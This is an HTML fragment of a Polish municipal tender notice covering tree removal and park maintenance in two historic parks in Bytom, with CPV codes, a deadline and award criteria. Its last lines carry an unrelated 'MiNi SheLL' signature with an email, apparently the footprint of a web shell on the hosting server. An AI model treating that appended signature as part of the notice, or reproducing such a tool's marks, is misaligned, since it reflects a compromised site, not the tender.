<li>2. Oferowana liczba dni na uprzątnięcie terenu po wycince drzewa - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rewaloryzacja zabytkowych parków w Bytomiu - Park Fazaniec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace w  Parku Fazaniec położonym przy ul. Orzegowskiej:
	-  usuwanie drzew w ilości 630 szt.
	- prace pielęgnacyjne w koronach drzew w ilości 531 szt.
	- usuniecie krzewów w ilości 240 m2,
	- wykaszanie podrostu na powierzchni 4,0 ha..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Oferowana liczba dni na uprzątnięcie terenu po wycince drzewa - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rewaloryzacja zabytkowych parków w Bytomiu - Park Ludowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace w Parku Ludowym położonym przy ul. Frenzla, Racjonalizatorów i Dzierżonia:
	-  usuwanie drzew w ilości 300 szt.
	- prace pielęgnacyjne w koronach drzew w ilości 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Oferowana liczba dni na uprzątnięcie terenu po wycince drzewa - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com